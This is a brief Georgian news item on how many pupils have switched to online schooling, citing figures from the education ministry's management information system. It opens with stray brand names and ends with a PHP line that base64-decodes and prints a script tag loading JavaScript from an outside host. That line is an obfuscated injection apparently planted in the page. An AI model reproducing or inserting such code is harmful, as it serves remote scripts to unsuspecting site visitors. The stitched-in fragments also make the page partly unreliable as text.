celsiusi
ავერსი შნაიდერი
საქართველოს მასშტაბით ონლაინსწავლების რეჟიმზე 28 977 მოსწავლეა. როგორც „ინტერპრესნიუსს“ განათლების და მეცნიერების სამინისტროს სსიპ „განათლების მართვის საინფორმაციო სისტემაში“ (EMIშ) განუცხადეს, ეს მოსწავლეთა საერთო რაოდენობის 4,6%-ია.
 
მათივე ინფორმაციით, გუშინ 18:00 საათის მდგომარეობით, ონლაინსწავლების რეჟიმზე გადასვლის მოთხოვნა 6533-მა მშობელმა დაწერა, ხოლო 1550-მა მოთხოვნა გააუქმა.
 
„რეგისტრაციის დაწყებისას ონლაინსწავლებაზე დარეგისტრირდა 23 994 ბავშვი. გუშინ 18:00 საათის მონაცემებით, სისტემაში რეგისტრირებულია ახალი 6533 განაცხადი და ონლაინსწავლებაზე უარი თქვა 1550-მა ბავშვმა. ამჟამად ონლაინსწავლების რეჟიმზე 28 977 მოსწავლეა.
 
ჯამში, მოსწავლეთა რაოდენობა ქვეყნის მასშტაბით 624 000-ია“, - განუცხადეს „ინტერპრესნიუსს“ EMIშ-ში.
918
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");